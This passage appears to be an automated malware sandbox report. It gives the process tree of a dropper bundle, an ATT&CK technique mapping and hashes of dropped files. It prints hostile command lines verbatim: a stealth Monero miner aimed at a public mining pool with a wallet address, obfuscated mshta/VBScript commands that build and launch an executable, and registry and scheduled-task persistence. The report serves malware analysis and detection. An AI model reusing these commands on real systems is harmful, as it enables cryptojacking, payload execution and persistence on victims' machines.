        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        12⤵
        
        PID:4888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07a9799f68e7.exe /mixtwo
      4⤵
      PID:4868
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07a9799f68e7.exe
        
        Sun07a9799f68e7.exe /mixtwo
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3192
      - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07a9799f68e7.exe
        
        Sun07a9799f68e7.exe /mixtwo
        6⤵
        Executes dropped EXE
        
        PID:4512
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun07a9799f68e7.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07a9799f68e7.exe" & exit
        7⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun07a9799f68e7.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:6092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07d7bdaf7c.exe
      4⤵
      PID:2852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07d46efb4bd1.exe
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07610e6b216b74271.exe
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07bb82f51727fc79.exe
      4⤵
      PID:4280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07923b89b57.exe
      4⤵
      PID:2208

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07923b89b57.exe
Sun07923b89b57.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2284
- C:\Users\Admin\AppData\Roaming\1522257.exe
  "C:\Users\Admin\AppData\Roaming\1522257.exe"
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Users\Admin\AppData\Roaming\5473224.exe
  "C:\Users\Admin\AppData\Roaming\5473224.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5148
- - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    3⤵
    PID:5920
- C:\Users\Admin\AppData\Roaming\2375662.exe
  "C:\Users\Admin\AppData\Roaming\2375662.exe"
  2⤵
  PID:5308
- C:\Users\Admin\AppData\Roaming\4699309.exe
  "C:\Users\Admin\AppData\Roaming\4699309.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:5768
- C:\Users\Admin\AppData\Roaming\8150769.exe
  "C:\Users\Admin\AppData\Roaming\8150769.exe"
  2⤵
  - Executes dropped EXE
  PID:4492
- C:\Users\Admin\AppData\Roaming\1768884.exe
  "C:\Users\Admin\AppData\Roaming\1768884.exe"
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\1768884.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\1768884.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
    3⤵
    PID:5332
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\1768884.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\1768884.exe" ) do taskkill -F -IM "%~Nxv"
      4⤵
      PID:5616
    - - C:\Users\Admin\AppData\Local\Temp\Qw5u.exe
        
        Qw5U.Exe -PmowtdFUhhnCoUk
        5⤵
        
        PID:2232
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk ""== """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        6⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "-PmowtdFUhhnCoUk "== "" for %v In ("C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" ) do taskkill -F -IM "%~Nxv"
        7⤵
        
        PID:6096
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIPt:CloSE( cREateOBJecT ( "WscRipt.SHeLl").Run("CMD /Q /C ECHO | sEt /P = ""MZ"" > IEEeXE.7YX & CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ ",0,tRUE) )
        6⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C ECHO | sEt /P = "MZ" > IEEeXE.7YX&CoPY /b /Y IEEeXE.7YX+WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ
        7⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>IEEeXE.7YX"
        8⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
        8⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\control.exe
        
        control.exe .\B0M3YFV5.lRJ
        8⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ
        9⤵
        
        PID:5664
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ
        10⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\B0M3YFV5.lRJ
        11⤵
        
        PID:4716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -IM "1768884.exe"
        5⤵
        Kills process with taskkill
        
        PID:3856
- C:\Users\Admin\AppData\Roaming\298642.exe
  "C:\Users\Admin\AppData\Roaming\298642.exe"
  2⤵
  PID:5904

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07d7bdaf7c.exe
Sun07d7bdaf7c.exe
1⤵
- Executes dropped EXE
PID:4556
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 300
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4044

C:\Users\Admin\AppData\Local\Temp\is-DJSJI.tmp\Sun0746b3c4631.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DJSJI.tmp\Sun0746b3c4631.tmp" /SL5="$3017A,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0746b3c4631.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1416
- C:\Users\Admin\AppData\Local\Temp\is-SSD7R.tmp\lakazet.exe
  "C:\Users\Admin\AppData\Local\Temp\is-SSD7R.tmp\lakazet.exe" /S /UID=2720
  2⤵
  PID:3620
- - C:\Users\Admin\AppData\Local\Temp\82-94900-820-4dbb1-ca0738f37f6bd\ZHamolodaeho.exe
    "C:\Users\Admin\AppData\Local\Temp\82-94900-820-4dbb1-ca0738f37f6bd\ZHamolodaeho.exe"
    3⤵
    PID:5192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
      4⤵
      PID:5204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc966546f8,0x7ffc96654708,0x7ffc96654718
        5⤵
        
        PID:1184
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
        5⤵
        
        PID:6360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
        5⤵
        
        PID:6520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
        5⤵
        
        PID:6448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
        5⤵
        
        PID:6896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        5⤵
        
        PID:6248
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
        5⤵
        
        PID:3372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
        5⤵
        
        PID:6756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
        5⤵
        
        PID:4496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
        5⤵
        
        PID:1068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,15658276252505051099,12469699851614808001,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
        5⤵
        
        PID:6584
- - C:\Users\Admin\AppData\Local\Temp\b5-385e9-5be-60582-d13ddd9def15c\Lopycalyto.exe
    "C:\Users\Admin\AppData\Local\Temp\b5-385e9-5be-60582-d13ddd9def15c\Lopycalyto.exe"
    3⤵
    PID:4112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djkaumtu.3r0\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:4200
    - - C:\Users\Admin\AppData\Local\Temp\djkaumtu.3r0\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\djkaumtu.3r0\installer.exe /qn CAMPAIGN="654"
        5⤵
        
        PID:5504
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe & exit
      4⤵
      PID:1448
    - - C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe
        5⤵
        
        PID:6496
      - C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ygpwmboh.0vm\any.exe" -u
        6⤵
        
        PID:4376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxscqur1.0pp\autosubplayer.exe /S & exit
      4⤵
      PID:7088
    - - C:\Users\Admin\AppData\Local\Temp\yxscqur1.0pp\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\yxscqur1.0pp\autosubplayer.exe /S
        5⤵
        
        PID:7044
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbAAC5.tmp\tempfile.ps1"
        6⤵
        
        PID:3980
- - C:\Program Files\MSBuild\ZOMALTLCEV\foldershare.exe
    "C:\Program Files\MSBuild\ZOMALTLCEV\foldershare.exe" /VERYSILENT
    3⤵
    PID:4288

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07bb82f51727fc79.exe
Sun07bb82f51727fc79.exe
1⤵
- Executes dropped EXE
PID:5108
- C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
  "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
  2⤵
  - Executes dropped EXE
  PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
    3⤵
    PID:5456
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
      4⤵
      PID:2380
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:5580
- - C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe"
    3⤵
    PID:2208

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07610e6b216b74271.exe
Sun07610e6b216b74271.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3500
- C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07610e6b216b74271.exe
  C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07610e6b216b74271.exe
  2⤵
  PID:3048

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07d46efb4bd1.exe
Sun07d46efb4bd1.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:852
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 1872
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4556 -ip 4556
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 852 -ip 852
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5552

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6124
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:2940
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 448
    3⤵
    - Program crash
    PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2940 -ip 2940
1⤵
PID:5396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4820 -ip 4820
1⤵
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5984 -ip 5984
1⤵
PID:5412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 6132 -ip 6132
1⤵
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2208 -ip 2208
1⤵
PID:5680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 496 -p 5280 -ip 5280
1⤵
PID:5340

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 1592 -ip 1592
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5512 -ip 5512
1⤵
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2208 -ip 2208
1⤵
PID:6032

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 5304 -ip 5304
1⤵
PID:1392

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1728
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 448
    3⤵
    - Program crash
    PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4024 -ip 4024
1⤵
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5680 -ip 5680
1⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1108 -ip 1108
1⤵
PID:2468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
1⤵
- Executes dropped EXE
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6068 -ip 6068
1⤵
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5252 -ip 5252
1⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6140 -ip 6140
1⤵
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4228 -ip 4228
1⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4736 -ip 4736
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5584 -ip 5584
1⤵
PID:1068

C:\Users\Admin\AppData\Local\Temp\5705.exe
C:\Users\Admin\AppData\Local\Temp\5705.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5308
- C:\Users\Admin\AppData\Local\Temp\5705.exe
  C:\Users\Admin\AppData\Local\Temp\5705.exe
  2⤵
  PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2464 -ip 2464
1⤵
PID:3436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 4508 -ip 4508
1⤵
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1604 -ip 1604
1⤵
PID:7004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\A035.exe
C:\Users\Admin\AppData\Local\Temp\A035.exe
1⤵
PID:6704
- C:\Users\Admin\AppData\Local\Temp\A035.exe
  C:\Users\Admin\AppData\Local\Temp\A035.exe
  2⤵
  PID:6424

C:\Users\Admin\AppData\Local\Temp\C292.exe
C:\Users\Admin\AppData\Local\Temp\C292.exe
1⤵
PID:3340
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 296
  2⤵
  - Program crash
  PID:5628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\EA7E.exe
C:\Users\Admin\AppData\Local\Temp\EA7E.exe
1⤵
PID:7016
- C:\Users\Admin\AppData\Local\Temp\EA7E.exe
  C:\Users\Admin\AppData\Local\Temp\EA7E.exe
  2⤵
  PID:1416

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6296
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 142A9FF888478E637E204336A33F3F4B C
  2⤵
  PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3340 -ip 3340
1⤵
PID:6028

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6036
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5776
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 448
    3⤵
    - Program crash
    PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5776 -ip 5776
1⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\313D.exe
C:\Users\Admin\AppData\Local\Temp\313D.exe
1⤵
PID:452

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sun07610e6b216b74271.exe.log

MD5
e07da89fc7e325db9d25e845e27027a8

SHA1
4b6a03bcdb46f325984cbbb6302ff79f33637e19

SHA256
94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf

SHA512
1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda

Download Submit
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

MD5
6b9bd0b627fe13d3eab55e0f8c68d21e

SHA1
6adf70211a0716806222c477f30f6ce5fb2c84df

SHA256
afc8583d6bccb31ab94541d6f23461c52c0e46cdb03e274c4b7292ba387268bd

SHA512
d6e3e286849e4a485728e22e2fa28ae815dbc4466b654ad4cfb989d6061342d64a95a0c95d704692ec8dc31053c63a18531d8aa51f8b6caaa7cbb59fb4516b79

Download Submit
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

MD5
6b9bd0b627fe13d3eab55e0f8c68d21e

SHA1
6adf70211a0716806222c477f30f6ce5fb2c84df

SHA256
afc8583d6bccb31ab94541d6f23461c52c0e46cdb03e274c4b7292ba387268bd

SHA512
d6e3e286849e4a485728e22e2fa28ae815dbc4466b654ad4cfb989d6061342d64a95a0c95d704692ec8dc31053c63a18531d8aa51f8b6caaa7cbb59fb4516b79

Download Submit
C:\Users\Admin\AppData\Local\Temp\33270453748302423051

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
